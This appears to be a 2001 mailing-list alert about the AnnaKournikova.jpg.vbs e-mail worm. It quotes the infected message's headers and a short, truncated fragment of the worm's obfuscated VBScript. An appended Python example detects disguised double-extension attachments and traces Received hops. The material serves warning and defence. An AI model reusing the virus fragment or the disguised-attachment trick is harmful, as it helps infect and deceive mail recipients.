Anyone using a PC to read this e-mail should run an anti-virus scan asap using current definitions.

A copy of a new vbs MIME virus (AnnaKournikova.jpg.vbs) was posted to the firewalls mailing list from what seems to be a system on a private network at the address 192.168.254.198, apparently using 24-216-123-82.hsacorp.net [24.216.123.82] as an SMTP server, which may or may not have a mail account defined for Gary Rollie <[EMAIL PROTECTED]> (mail headers are so easy to forge, after all).

A brief description of the virus is at
http://www.sophos.com/virusinfo/analyses/vbsssta.html

The message headers are quoted below.

Selden
======
Selden E. Ball, Jr.
Cornell University              Voice: +1-607-255-0688
Laboratory of Nuclear Studies   FAX: +1-607-255-8062
230A Wilson Synchrotron Lab     http://www.lns.cornell.edu/~seb/
Judd Falls & Dryden Road        Internet: [EMAIL PROTECTED]
Ithaca, NY, USA 14853-8001      HEPnet/SPAN: LNS62::SEB = 44284::SEB
==========================

> Return-path: <[EMAIL PROTECTED]>
> Disposition-notification-to: [EMAIL PROTECTED]
> Received: from spike.rwc.gnac.net (spike.rwc.gnac.net [209.182.195.137])
>   by LNS61.LNS.CORNELL.EDU (PMDF V6.0-24 #41791)
>   with SMTP id <[EMAIL PROTECTED]> for
>   [EMAIL PROTECTED] (ORCPT [EMAIL PROTECTED]); Mon,
>   12 Feb 2001 14:53:17 -0500 (EST)
> Received: (qmail 13894 invoked by uid 15); Mon, 12 Feb 2001 18:26:52 +0000
> Received: from decalpha2.iwarrior.com
>   (24-216-123-82.hsacorp.net [24.216.123.82])
>   by spike.rwc.gnac.net (8.8.8/8.8.8) with ESMTP id KAA13498 for
>   <[EMAIL PROTECTED]>; Mon, 12 Feb 2001 10:26:34 -0800 (PST)
> Received: from [192.168.254.198] by decalpha2.iwarrior.com
>   (NTMail 5.05.0002/NU4254.00.4b74499a) with ESMTP id usdaaaaa for
>   [EMAIL PROTECTED]; Mon, 12 Feb 2001 02:05:00 -0500
> Date: Mon, 12 Feb 2001 13:26:08 -0500
> From: Gary Rollie <[EMAIL PROTECTED]>
> Subject: Here you have, ;o)
> Sender: [EMAIL PROTECTED]
> To: "Firewalls@Lists. GNAC. NET" <[EMAIL PROTECTED]>
> Message-id: <015b01c09521$44ba66e0$[EMAIL PROTECTED]>
> MIME-version: 1.0
> X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
> X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
> Content-type: multipart/mixed; boundary="Boundary_(ID_Cs+2iD9YB/4yhEF3SIGRdg)"
> Importance: Normal
> X-Priority: 3 (Normal)
> X-MSMail-priority: Normal
> Precedence: bulk
> X-Loop: [EMAIL PROTECTED]
> Delivered-to: [EMAIL PROTECTED]
> Original-recipient: rfc822;[EMAIL PROTECTED]
>
>
> --Boundary_(ID_Cs+2iD9YB/4yhEF3SIGRdg)
> Content-type: text/plain; charset="iso-8859-1"
>
>
> Hi:
>
> Check This!
>
> --Boundary_(ID_Cs+2iD9YB/4yhEF3SIGRdg)
> Content-type: application/octet-stream; name="AnnaKournikova.jpg.vbs"
> Content-transfer-encoding: quoted-printable
> Content-disposition: attachment; filename="AnnaKournikova.jpg.vbs"
>
> 'Vbs.OnTheFly Created By OnTheFly=0D=0AExecute e7iqom5JE4z("X)udQ0Vpg=
> jnH=11{tEcggv=11f{DQ=11VpgjnH=10{Q=0F=11ptGqt=11tgTwugoP=11zg=10vU=
> =0FvgG=11Q9v58Jr7R6?=11E=11gtvcQgldeg*vY$eUktvrU0gjnn+$=0F=109G5QJv78=

[remainder of virus omitted]
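
The header reading done in the message above, as an added example that is not part of the original post: it walks the Received chain oldest hop first, reports a private-address origin, and flags attachments whose harmless-looking extension hides a script extension. The sample message is constructed and abridged from the quoted headers, the function names and extension lists are assumptions, and since Received lines below the first server you trust can be forged, the origin it reports is a lead rather than proof.

```python
import email, ipaddress, re

# Constructed, abridged sample modelled on the quoted headers (redacted fields left out).
RAW = """\
Received: from spike.rwc.gnac.net (spike.rwc.gnac.net [209.182.195.137])
 by LNS61.LNS.CORNELL.EDU with SMTP; Mon, 12 Feb 2001 14:53:17 -0500 (EST)
Received: from decalpha2.iwarrior.com (24-216-123-82.hsacorp.net [24.216.123.82])
 by spike.rwc.gnac.net with ESMTP; Mon, 12 Feb 2001 10:26:34 -0800 (PST)
Received: from [192.168.254.198] by decalpha2.iwarrior.com
 with ESMTP; Mon, 12 Feb 2001 02:05:00 -0500
Subject: Here you have, ;o)
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="AnnaKournikova.jpg.vbs"

(payload omitted)
--b1--
"""

SCRIPT_EXT = {"vbs", "vbe", "js", "jse", "wsf", "wsh", "scr", "pif", "bat", "cmd", "exe"}
DECOY_EXT = {"jpg", "jpeg", "gif", "png", "txt", "doc", "pdf"}

def received_hops(msg):
    """Return (sender_ip, receiving_host) per Received header, oldest hop first."""
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        flat = " ".join(value.split())  # undo header folding
        ip = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", flat)
        by = re.search(r"\bby (\S+)", flat)
        hops.append((ip.group(1) if ip else None, by.group(1) if by else None))
    return hops

def private_origin(hops):
    """IP of the oldest hop if it lies in private address space, else None."""
    ip = hops[0][0] if hops else None
    return ip if ip and ipaddress.ip_address(ip).is_private else None

def double_extension_attachments(msg):
    """Filenames of the form name.<decoy>.<script>, e.g. picture.jpg.vbs."""
    hits = []
    for part in msg.walk():
        pieces = (part.get_filename() or "").lower().rsplit(".", 2)
        if len(pieces) == 3 and pieces[1] in DECOY_EXT and pieces[2] in SCRIPT_EXT:
            hits.append(part.get_filename())
    return hits

MSG = email.message_from_string(RAW)
```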
